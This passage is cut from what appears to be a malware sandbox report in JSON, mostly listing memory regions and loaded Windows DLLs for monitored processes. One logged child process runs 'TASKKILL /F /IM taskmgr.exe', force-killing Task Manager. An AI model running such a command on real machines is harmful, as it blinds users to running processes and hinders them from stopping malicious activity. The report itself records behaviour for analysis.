}, "end_va": 1787912191, "entry_point": 1787427001, "filename": "\\Windows\\SysWOW64\\wbem\\fastprox.dll", "id": "region_4968", "name": "fastprox.dll", "norm_filename": "c:\\windows\\syswow64\\wbem\\fastprox.dll", "region_type": "memory_mapped_file", "start_va": 1787297792, "timestamp": "00:01:37.300", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 1958543360, "type": "region", "version": 1 }, "end_va": 1958641663, "entry_point": 1958548277, "filename": "\\Windows\\SysWOW64\\ntdsapi.dll", "id": "region_4969", "name": "ntdsapi.dll", "norm_filename": "c:\\windows\\syswow64\\ntdsapi.dll", "region_type": "memory_mapped_file", "start_va": 1958543360, "timestamp": "00:01:37.300", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "TASKKILL /F /IM taskmgr.exe /IM taskmgr.exe", "filename": "c:\\windows\\syswow64\\taskkill.exe", "id": "proc_43", "image_name": "taskkill.exe", "monitor_reason": "child_process", "monitored_id": 43, "origin_monitor_id": 10, "ref_parent_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_4970", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:37.806", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_4971", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:01:37.806", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_4972", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:37.806", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_4973", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:37.808", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_4974", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:37.808", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1900543, "entry_point": 0, "filename": null, "id": "region_4975", "name": "private_0x0000000000190000", "norm_filename": null, "region_type": "private_memory", "start_va": 1638400, "timestamp": "00:01:37.808", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2359296, "type": "region", "version": 1 }, "end_va": 2621439, "entry_point": 0, "filename": null, "id": "region_4976", "name": "private_0x0000000000240000", "norm_filename": null, "region_type": "private_memory", "start_va": 2359296, "timestamp": "00:01:37.808", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 14090240, "type": "region", "version": 1 }, "end_va": 14180351, "entry_point": 14113929, "filename": "\\Windows\\SysWOW64\\taskkill.exe", "id": "region_4977", "name": "taskkill.exe", "norm_filename": "c:\\windows\\syswow64\\taskkill.exe", "region_type": "memory_mapped_file", "start_va": 14090240, "timestamp": "00:01:37.808", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_4978", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:01:37.809", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_4979", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:01:37.809", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_4980", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:01:37.810", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_4981", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:01:37.810", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_4982", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:01:37.810", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_4983", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:01:37.810", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_4984", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:37.810", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_4985", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:37.810", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_4986", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:01:37.810", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 1310719, "entry_point": 0, "filename": null, "id": "region_4987", "name": "private_0x00000000000c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 786432, "timestamp": "00:01:37.815", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_4988", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:01:37.815", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_4989", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:01:37.815", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_4990", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:01:37.816", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_4991", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:01:37.816", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_4992", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:01:37.816", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_4993", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:37.839", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_4994", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:37.839", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1900544, "type": "region", "version": 1 }, "end_va": 2322431, "entry_point": 1900544, "filename": "\\Windows\\System32\\locale.nls", "id": "region_4995", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1900544, "timestamp": "00:01:37.839", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2949120, "type": "region", "version": 1 }, "end_va": 3997695, "entry_point": 0, "filename": null, "id": "region_4996", "name": "private_0x00000000002d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2949120, "timestamp": "00:01:37.840", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 4980736, "type": "region", "version": 1 }, "end_va": 5046271, "entry_point": 0, "filename": null, "id": "region_4997", "name": "private_0x00000000004c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4980736, "timestamp": "00:01:37.840", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 962560, "start_va": 1786970112, "type": "region", "version": 1 }, "end_va": 1787932671, "entry_point": 1786975182, "filename": "\\Windows\\SysWOW64\\dbghelp.dll", "id": "region_4998", "name": "dbghelp.dll", "norm_filename": "c:\\windows\\syswow64\\dbghelp.dll", "region_type": "memory_mapped_file", "start_va": 1786970112, "timestamp": "00:01:37.840", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1941569536, "type": "region", "version": 1 }, "end_va": 1941643263, "entry_point": 1941574144, "filename": "\\Windows\\SysWOW64\\mpr.dll", "id": "region_4999", "name": "mpr.dll", "norm_filename": "c:\\windows\\syswow64\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 1941569536, "timestamp": "00:01:37.840", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1946681344, "type": "region", "version": 1 }, "end_va": 1946714111, "entry_point": 1946685673, "filename": "\\Windows\\SysWOW64\\secur32.dll", "id": "region_5000", "name": "secur32.dll", "norm_filename": "c:\\windows\\syswow64\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 1946681344, "timestamp": "00:01:37.841", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1958019072, "type": "region", "version": 1 }, "end_va": 1958055935, "entry_point": 1958023712, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_5001", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", "start_va": 1958019072, "timestamp": "00:01:37.841", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 1959002112, "type": "region", "version": 1 }, "end_va": 1959063551, "entry_point": 1959006881, "filename": "\\Windows\\SysWOW64\\wkscli.dll", "id": "region_5002", "name": "wkscli.dll", "norm_filename": "c:\\windows\\syswow64\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 1959002112, "timestamp": "00:01:37.842", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1959067648, "type": "region", "version": 1 }, "end_va": 1959104511, "entry_point": 1959073190, "filename": "\\Windows\\SysWOW64\\netutils.dll", "id": "region_5003", "name": "netutils.dll", "norm_filename": "c:\\windows\\syswow64\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 1959067648, "timestamp": "00:01:37.842", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 1959133184, "type": "region", "version": 1 }, "end_va": 1959202815, "entry_point": 1959138048, "filename": "\\Windows\\SysWOW64\\netapi32.dll", "id": "region_5004", "name": "netapi32.dll", "norm_filename": "c:\\windows\\syswow64\\netapi32.dll", "region_type": "memory_mapped_file", "start_va": 1959133184, "timestamp": "00:01:37.842", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1959264256, "type": "region", "version": 1 }, "end_va": 1959317503, "entry_point": 1959268832, "filename": "\\Windows\\SysWOW64\\wtsapi32.dll", "id": "region_5005", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\syswow64\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1959264256, "timestamp": "00:01:37.843", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1959329792, "type": "region", "version": 1 }, "end_va": 1959546879, "entry_point": 1959334869, "filename": "\\Windows\\SysWOW64\\framedynos.dll", "id": "region_5006", "name": "framedynos.dll", "norm_filename": "c:\\windows\\syswow64\\framedynos.dll", "region_type": "memory_mapped_file", "start_va": 1959329792, "timestamp": "00:01:37.843", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1966276608, "type": "region", "version": 1 }, "end_va": 1966379007, "entry_point": 1966281497, "filename": "\\Windows\\SysWOW64\\srvcli.dll", "id": "region_5007", "name": "srvcli.dll", "norm_filename": "c:\\windows\\syswow64\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 1966276608, "timestamp": "00:01:37.844", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_5008", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:01:37.844", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_5009", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:01:37.845", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_5010", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:01:37.845", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_5011", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:01:37.846", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_5012", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:01:37.846", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_5013", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:01:37.847", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1987932159, "entry_point": 1987681190, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_5014", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:01:37.847", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1989799935, "entry_point": 1989230513, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_5015", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:01:37.847", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_5016", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:01:37.848", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1992818688, "type": "region", "version": 1 }, "end_va": 1992843263, "entry_point": 1992824706, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_5017", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1992818688, "timestamp": "00:01:37.848", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_5018", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:01:37.849", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1994964991, "entry_point": 1993849405, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_5019", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:01:37.849", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_5020", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:01:37.850", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1997733888, "type": "region", "version": 1 }, "end_va": 1997950975, "entry_point": 1997739101, "filename": "\\Windows\\SysWOW64\\ws2_32.dll", "id": "region_5021", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\syswow64\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1997733888, "timestamp": "00:01:37.850", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_5022", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:01:37.851", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_5023", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:01:37.851", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_5024", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:01:37.852", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_5025", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:37.852", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_5026", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:37.852", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 5046272, "type": 